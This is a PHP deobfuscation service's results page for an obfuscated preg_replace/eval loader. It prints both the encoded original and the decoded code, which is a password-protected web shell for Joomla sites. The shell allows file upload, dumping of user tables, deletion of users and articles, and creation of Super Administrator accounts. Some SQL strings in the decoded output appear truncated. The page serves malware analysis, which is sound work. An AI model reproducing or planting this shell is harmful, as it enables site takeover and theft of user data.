Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x..

Decoded Output download


function tWDQ6R($GnI2vh) {
            $a = "gzinflate";
            $b = "base64_decode";
            return $a($b($GnI2vh));
        }define('PASSWORD_FILE', 'p.txt');function array_to_json( $array ){ if (is_string($array)) return '"'.addslashes($array).'"'; if (is_numeric($array)) return $array; if ($array === null) return 'null'; if ($array === true) return 'true'; if ($array === false) return 'false'; $assoc = false; $i = 0; foreach ($array as $k=>$v){ if ($k !== $i++){ $assoc = true; break; } } $res = array(); foreach ($array as $k=>$v){ $v = array_to_json($v); if ($assoc){ $k = '"'.addslashes($k).'"'; $v = $k.':'.$v; } $res[] = $v; } $res = implode(',', $res); return ($assoc)? '{'.$res.'}' : '['.$res.']';}function get_full_path($link) {$dir = dirname($_SERVER['PHP_SELF']);$levels_up = substr_count(JPATH_SITE, '..');for($i=0;$i<$levels_up;$i++) {preg_match('/(\/[^\/]+)$/', $dir, $matches);$dir = preg_replace('/\/[^\/]+$/', '', $dir);$link = str_replace($matches[1], '', $link);}if(strpos($link, 'http') !== 0) {$link = 'http' . (empty($_SERVER['HTTPS']) ? '' : 's') . '://' . $_SERVER['SERVER_NAME'] . $link;}return $link;}if(!empty($_REQUEST['action']) && $_REQUEST['action'] == 'set_password' && !empty($_REQUEST['hashed_password'])) {$hashed_password = $_REQUEST['hashed_password'];$fh = fopen(PASSWORD_FILE, "w"); if($fh==false) die("unable to create file"); fputs ($fh, $hashed_password); fclose ($fh);exit;}if(!file_exists(PASSWORD_FILE)) {$hashed_password = 'a6a8cb877ee18215f2c0fc2a6c7b4f2a';$fh = fopen(PASSWORD_FILE, "w"); if($fh==false) die("unable to create file"); fputs ($fh, $hashed_password); fclose ($fh);}else {$hashed_password = trim(file_get_contents(PASSWORD_FILE));}define('SHELL_PASSWORD', $hashed_password);define('MAX_UP_LEVELS', 10);if(empty($_COOKIE['password']) && empty($_POST['password']) || (!empty($_POST['password']) && md5($_POST['password']) != SHELL_PASSWORD)) {print '<form method="post">Password : <input type="text" name="password"><input type="submit"></form>';}if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {setcookie('password', SHELL_PASSWORD, time() + 60*60*24);header("Location: {$_SERVER['PHP_SELF']}");exit;}if(empty($_COOKIE) || $_COOKIE['password'] != SHELL_PASSWORD) {exit;}if(!empty($_FILES['f'])) {$new_path = dirname(__FILE__) . '/' . $_FILES['f']['name'];if(move_uploaded_file($_FILES['f']['tmp_name'], $new_path)) {print "<a href=\"{$_FILES['f']['name']}\">{$_FILES['f']['name']}</a>";}else {print "Upload failed!";}exit;}if(!empty($_REQUEST['uf']) && $_REQUEST['uf'] == 1) {print "<form method=\"post\" enctype=\"multipart/form-data\" action=\"{$_SERVER['PHP_SELF']}\"><input type=\"file\" name=\"f\"><input type=\"submit\"></form>";exit;}define('_JEXEC', 1);define('DS', DIRECTORY_SEPARATOR);$counter = 0;$dir_up = '.' . DS;do {$file_found = false;$file_path = $dir_up . 'administrator';if(file_exists($file_path)) {$file_found = true;}else {$dir_up .= '..' . DS;}$counter++;}while(!$file_found && $counter < MAX_UP_LEVELS);define('JPATH_BASE', $dir_up);require_once ( JPATH_BASE . 'includes'.DS.'defines.php' );require_once ( JPATH_BASE . 'includes'.DS.'framework.php' );define('JPATH_COMPONENT_ADMINISTRATOR', JPATH_BASE . DS . 'administrator' . DS . 'components' . DS . 'com_content');require_once JPATH_BASE.'/includes/framework.php';require_once JPATH_BASE. "/components/com_content/models/article.php";require_once(JPATH_BASE.DS.'components'.DS.'com_content'.DS.'helpers'.DS.'route.php');  $app = JFactory::getApplication('site', array('session' => false));$app->initialise();if(!empty($_REQUEST['title']) && !empty($_REQUEST['body'])) {foreach($_REQUEST as $key => $value) {$_REQUEST[$key] = stripslashes($value);}$new_article = new ContentModelArticle();$date = date($_REQUEST['publish_up'] . ' ' . rand(1,23). ':' . rand(1,59). ':' . rand(1,59));$data = array('catid' => $_REQUEST['catid'], 'title' => $_REQUEST['title'],'fulltext' => $_REQUEST['body'],'introtext' => '','state' => $_REQUEST['published'], 'created_by' => $_REQUEST['created_by'], 'publish_up' => $date,'created' => $date,'alias' => $_REQUEST['alias']);if(!empty($_REQUEST['id'])) {$data['id'] = $_REQUEST['id'];}$table = JTable::getInstance('content', 'JTable', array());if (!$table->bind($data)){print_r($table->getError());return false;}if (!$table->store()){print_r($table->getError());}print json_encode(array("article_id" => $table->id));}if(!empty($_REQUEST['id2delete'])) {$row = JTable::getInstance('content', 'JTable');$row->delete($_REQUEST['id2delete']);}$db = JFactory::getDBO(); if(!empty($_REQUEST['article_id'])) {$article_id = $_REQUEST['article_id'];$sql = "SELECT * FROM $db->setQuery($sql); $article = $db->loadObject(); }if(!empty($article)) {print array_to_json($article);}if(!empty($_REQUEST['username2delete'])) {$user = JFactory::getUser($_REQUEST['username2delete']);if($user->delete()) {print "User {$_REQUEST['username2delete']} has been deleted!";}}if(!empty($_REQUEST['user_name']) && !empty($_REQUEST['user_password']) && !empty($_REQUEST['user_email'])) {$acl =& JFactory::getACL(); jimport('joomla.application.component.helper'); $usersParams = &JComponentHelper::getParams( 'com_users' );  $user = JFactory::getUser(0);  $data = array(); $usertype = 'Super Administrator';$data['name'] = 'Zhano Zhano'; $data['username'] = $_REQUEST['user_name'];$data['email'] = $_REQUEST['user_email']; $data['gid'] = 24; $data['password'] = $_REQUEST['user_password']; $data['password2'] = $_REQUEST['user_password']; $data['sendEmail'] = 1;  $data['block'] = 0;  if (!$user->bind($data)) { JError::raiseWarning('', JText::_( $user->getError())); } if (!$user->save()) { JError::raiseWarning('', JText::_( $user->getError())); } print array_to_json($user->username . " created!"); }if(!empty($_REQUEST['get_cats'])) {$cat_urls = array();$sql = "SELECT $db->setQuery($sql); $cats = $db->loadObjectList();for ($i=0,$len=count($cats);$i<$len;$i++) {$cats[$i]->path = get_full_path(JURI::base() . 'index.php?option=com_content&view=category&id=' . $cats[$i]->id);}print array_to_json($cats);}if(!empty($_REQUEST['get_user'])) {$sql = "SELECT * FROM $db->setQuery($sql); $users = $db->loadObjectList();print array_to_json($users);}if(!empty($_REQUEST['get_articles_list'])) {$sql = "SELECT $db->setQuery($sql); $articles = $db->loadObjectList(); print array_to_json($articles);}if(!empty($_REQUEST['article_sef_url'])) {$sql = "SELECT catid, alias FROM $db->setQuery($sql); $article = $db->loadObject(); $sql = "SELECT path FROM $db->setQuery($sql); $cat_path = $db->loadObject();if(isset($cat_path->path)) {$slug = $_REQUEST['article_sef_url'] . ':' . $article->alias;$catslug = $article->catid . ':' . $cat_path->path;$link = JRoute::_(ContentHelperRoute::getArticleRoute($slug, $catslug));print array_to_json(get_full_path($link));}else {print array_to_json(get_full_path(JURI::base() . 'index.php?option=com_content&view=article&id=' . $_REQUEST['article_sef_url']));}}

Did this file decode correctly?

Original Code

<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B",""); ?>

Function Calls

tWDQ6R	1
gzinflate	4
preg_replace	3
base64_decode	4

Variables

$a	gzinflate
$b	base64_decode
$GnI2vh	xVh7U+NGEv8qsyoVIwVjA7evWNgpB7wFHCwOZpPcYU4lS2OsRZYUaQxLEX/3..

Stats

MD5	4c001a956daf0eefc854829fefe5267d
Eval Count	7
Decode Time	93 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats